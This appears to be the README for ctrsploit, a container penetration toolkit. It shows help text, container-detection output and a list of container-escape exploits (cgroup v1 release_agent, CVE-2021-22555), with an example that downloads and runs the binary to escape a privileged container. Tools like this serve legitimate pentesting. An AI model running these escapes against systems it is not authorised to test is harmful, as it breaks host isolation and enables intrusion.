A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment


Pre-Built Release




wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
./ctrsploit --help
   ctrsploit - A penetration toolkit for container environment

ctrsploit is a command line ... //TODO

   ctrsploit [global options] command [command options] [arguments...]

   auto, a     auto gathering information, and detect vuls, and exploit // TODO
   exploit, e  run a exploit
   env, e      gather information // TODO
   help, h     Shows a list of commands or help for one command

   --lang value  language for the greeting (default: "english")
   --help, -h    show help (default: false)

gather information


root@ctr:/# ./ctrsploit env
   ctrsploit env - gather information

   ctrsploit env command [command options] [arguments...]

   where, w        detect whether you are in the container, and which type of the container
   graphdriver, g  detect graphdriver type and extend information
   cgroups, c      gather cgroup information
   help, h         Shows a list of commands or help for one command

   --help, -h  show help (default: false)


root@ctr:/# ./ctrsploit  env  w
INFO[0000] ===========Docker=========
.dockerenv exists: ✔
rootfs contains 'docker': ✔
cgroup contains 'docker': ✘
the mount source of /etc/hosts contains 'docker': ✔
hostname match regex ^[0-9a-f]{12}$: ✔
=> is in docker: ✔ 
INFO[0000] ===========k8s=========
/var/run/secrets/kubernetes.io exists: ✘
hostname match k8s pattern: ✘
the mount source of /etc/hosts contains 'pods': ✘
cgroup contains 'kubepods': ✘
=> is in k8s: ✘ 

run a exploit

root@2aa13a052102:/# ./ctrsploit e
   ctrsploit exploit - run a exploit

   ctrsploit exploit command [command options] [arguments...]

   cgroupv1-release_agent, ra                       escape tech by using the notify_on_release of cgroup v1
   cgroupv1-release_agent-unknown_rootfs, ra3       escape tech by using the notify_on_release of cgroup v1 without known rootfs
   help, h                                          Shows a list of commands or help for one command

   --help, -h  show help (default: false)

eg. : escape by 'cgroupv1-release_agent' tech.

root@host # docker run -ti --rm --security-opt="apparmor=unconfined" --cap-add="sys_admin" busybox
root@ctr # wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
root@ctr # ./ctrsploit e ra -c "cat /etc/hostname"



command alias description
where w detect whether you are in the container, and which type of the container
graphdriver g detect graphdriver type and extend information
cgroups c gather cgroup information
capability cap show the capability of pid 1 and current process
seccomp s show the seccomp info
apparmor a show the apparmor info


exploit alias description
cgroupv1-release_agent ra escape tech by using the notify_on_release of cgroup v1
cgroupv1-release_agent-unknown_rootfs ra3 escape tech by using the notify_on_release of cgroup v1 without known rootfs
cve-2021-22555 22555 escape tech by using the CVE-2021-22555
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